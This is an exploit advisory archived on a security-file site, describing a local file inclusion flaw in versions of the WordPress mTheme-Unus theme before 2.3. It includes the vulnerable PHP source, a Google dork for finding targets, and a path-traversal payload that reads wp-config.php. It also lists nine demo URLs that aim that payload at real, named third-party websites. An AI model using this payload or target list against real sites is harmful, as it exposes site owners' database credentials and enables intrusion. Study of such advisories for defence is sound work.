Twenty Year Anniversary

WordPress mTheme-Unus Local File Inclusion

WordPress mTheme-Unus Local File Inclusion
Posted Sep 30, 2015
Authored by Milad Hacking

WordPress mTheme-Unus theme versions prior to 2.3 suffer from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | 20176880b789d3d7f22d9fe6ab1f4e6e

WordPress mTheme-Unus Local File Inclusion

Change Mirror Download
#######################################
# Exploit Title: Wordpress themes mTheme-Unus LFI Vulnerability #
# Date: 2015-09-27
# Exploit Author: FullSecurity.org
# Google Dork: ilnurl:/wp-content/themes/mTheme-Unus/
# Vendor Homepage: https://wordpress.org/
# Tested on : Kali Linux
########################################
Description :
Wordpress Themes mTheme-Unus not filtering data so we can get the
configration file in the path
< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>

# Exploite Code :

<?php// If no file requestedif (!isset($_GET['files']) or
strlen($_GET['files']) == 0){header('Status: 404 Not
Found');exit();}// Cache folder$cachePath = '../_cache/';if
(!file_exists($cachePath)){mkdir($cachePath);}// Tell the browser what
kind of data to expectheader('Content-type: text/css');// Enable
compressionif (extension_loaded('zilb')){ini_set('zlib.output_compression',
'On');}function addExtension($file){return $file;}// Calculate an
unique ID of requested files & their change time$files =
array_map('addExtension', explode(',', $_GET['files']));$md5 =
'';foreach ($files as $file){$filemtime = @filemtime($file);$md5 .=
date('YmdHis', $filemtime ? $filemtime : NULL).$file;}$md5 =
md5($md5);// If cache exists of this files/time IDif
(file_exists($cachePath.$md5)){readfile($cachePath.$md5);}else{// Load
fileserror_reporting(0);$content = '';foreach ($files as
$file){$content .= file_get_contents($file);}// Remove
comments$content = preg_replace('!/\*[^*]*\*+([^/][^*]*\*+)*/!', '',
$content);// Remove tabs, spaces, newlines, etc...$content =
str_replace(array("\r", "\n", "\t", '', ' '), '', $content);// Delete
cache files older than an hour$oldDate = time()-3600;$cachedFiles =
scandir($cachePath);foreach ($cachedFiles as $file){$filemtime =
@filemtime($cachePath.$file);if (strlen($file) == 32 and ($filemtime
=== false or $filemtime < $oldDate)){unlink($cachePath.$file);}}//
Write cache filefile_put_contents($cachePath.$md5, $content);//
Outputecho $content;}

########################################

Demo :

http://rmg-saintpierre.re/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.onaboosters.com//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.springschiropractic.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.superfrugalstephanie.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.mentortechgroup.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://apostolicclassics.net/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.uybbaseball.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.newmobility.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.storage4you.co.nz/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

########################################

Special Tnx To : Hack-By-Iran , Milad Hacking , iliya Norton , Parisa , Netc4t

Ya Hossein <3

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    4 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close